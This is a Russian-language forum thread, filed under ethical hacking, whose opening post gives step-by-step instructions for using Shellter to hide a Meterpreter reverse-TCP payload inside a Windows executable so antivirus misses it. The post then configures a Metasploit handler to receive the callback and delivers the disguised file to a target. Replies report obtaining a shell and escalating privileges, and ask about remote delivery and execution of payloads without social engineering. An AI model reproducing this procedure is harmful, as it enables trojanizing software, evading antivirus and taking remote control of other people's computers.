Как обходить антивирусов при тестировании на проникновение в систему

Тема в разделе "Этичный хакинг и тестирование на проникновение", создана пользователем Adil Adilzade, 15 фев 2016.

  1. Adil Adilzade

    Adil Adilzade Гость

    Сегодня речь пойдет об очень редком материале в интернете, о программе называемой как Шэллтер (Shellter). Принцип работы софта очень прост - программа берет exe файл из Windows и чудным способом преобразует его так чтобы он "не палился" антивирусом (для удаленного доступа к жертве). Автоматический мод программы позволяет пользователю указать лишь нужные параметры, об остальном она позаботится сама.

    Я думаю столько информации хватит давайте приступим к делу.

    (Сразу оговариваюсь, что я не несу ответственность за нанесенный вред вашему или другому компьютеру. Это все проводится в ознакомительных целях.)

    [​IMG]


    1) Скачайте и установите программу https://www.shellterproject.com/download/

    2) Разархивируйте и перенесите в раздел 'root/Desktop'.

    3) Перенесите “plink.exe” из ‘usr/share/windows-binaries’ и скопируйте его в папку с Shellter, т.е сюда ‘/root/Desktop/shellter’.

    4) Чтобы начать использовать пишите в терминале “wine shellter.exe” (без кавычек)

    5) Нажмите “A” для переключения на автоматический режим.

    6) В следующем напишите “plink.exe”, который мы скопировали в директорию с Шэллтэром.

    7) EnableStealthMode? Здесь нажмите “Y”. Это позволит программе сохранить exe файл без лишнего кода т.е оригинал.

    8) Когда программа спрашивает вас выбрать Payload нажмите сперва на L потом выберите 1 для Meterpreter_Reverse_TCP. Если выберите 'С' то программа выберет наугад.

    9) Дальше вы должны написать ваш локальный ip адрес с которой "проводите тестирование на проникновение".

    10) Напишите порт (я написал 4545)
    Нажмите на энтэр
    Здесь Шэллтэт преобразует код для вас.

    После завершения работы вы увидите свой ‘plink.exe’ (замаскированный файл) и ‘plink.exe.bak’ (originalfile) в директории Shellter.

    Вот и все мы закончили свое дело с Шэллтэром. А теперь давайте вдобавок покажу вам как протестировать этот файл.

    11) Мы должны создать "Сервер прослушивания" для этого в терминале пишем:

    start Metasploit (‘msfconsole’ на терминале)

    use exploit/multi/handler

    set payload windows/meterpreter/reverse_tcp

    set lhost 192.168.1.39 (Это в моем случае,вы можете проверить свой айпи адрес командой "ifconfig")

    set lport 4545

    exploit

    12) Скопируйте (отправьте, дайте ссылку для скачивания и т.д) свой ‘plink.exe’ на Виндовс.

    Теперь если вы запустите свой файл на Виндовс, то вы увидите всего лишь справочный документ на терминале. Т.е мы получили доступ к компьютеру но не полноценно. Но если же мы хотели взять контроль над другой машиной мы написали бы.....

    plink 192.168.1.136

    (Но не делаем потому что это противозаконно!)

    Все это перечисленное было на терминале Шэллтэра

    На терминале Метасплоита. (Снова оговариваюсь что это проводилось всего лишь в ознакомительных целях)

    Мы можем получить информацию о Виндовс набрав “sysinfo”. Т.е в метасплоите мы получили доступ к командной строке Виндовс

    Вот и все что я хотел показать вам. Надеюсь администратор увидит мой пост и отблагодарит книгой ! :) Всего хорошего..
     
    5 пользователям это понравилось.
  2. WebWare Team

    WebWare Team Администратор
    Команда форума

    Регистрация:
    30 дек 2015
    Сообщения:
    213
    Симпатии:
    101
    Уважаемый Adil Adilzade, пожалуйста зарегистрируйтесь на форуме с того же IP, с которого написали это краткое руководство ☺
     
  3. Adil

    Adil New Member

    Регистрация:
    17 фев 2016
    Сообщения:
    1
    Симпатии:
    3
    Здравствуйте. Регистрацию прошел но не знаю с того ли айпи или нет )) честное слово это я ))
     
    3 пользователям это понравилось.
  4. Necromancer

    Necromancer New Member

    Регистрация:
    3 фев 2016
    Сообщения:
    4
    Симпатии:
    3
    Спасибо за хорошую статью. В целом программа полезная, шелл получить удалось. Пока еще не разобрался как подключать собственные эксплойты. (Находил где то статью на английском, но в большинство файлов эксплойт так засунуть и не удалось). Так же под вопросом доставка файла с эксплойтом и его удаленный запуск. (если отбросить соц.инж.)

    + еще вопрос, не совсем по теме (скорее относится к функционалу meterpreter) - в правах поднялся, доступ к реестур и файловой системе есть, но вот свои файлы загрузить удаленно через upload %path% не выходит. Читать и удалять файлы могу. Директории создаются корректно, а вот создать свой файл либо запихнуть готовый не выходит. (ошибка access denied) .Может что посоветуете?
     
  5. di3mus

    di3mus New Member

    Регистрация:
    21 сен 2016
    Сообщения:
    2
    Симпатии:
    1
    Насколько знаю stealthmode служит для внедрения нескольких нагрузок (http-reverse, tcp-reverse и т.д) в одном исполняемом файле.
     
Загрузка...

Поделиться этой страницей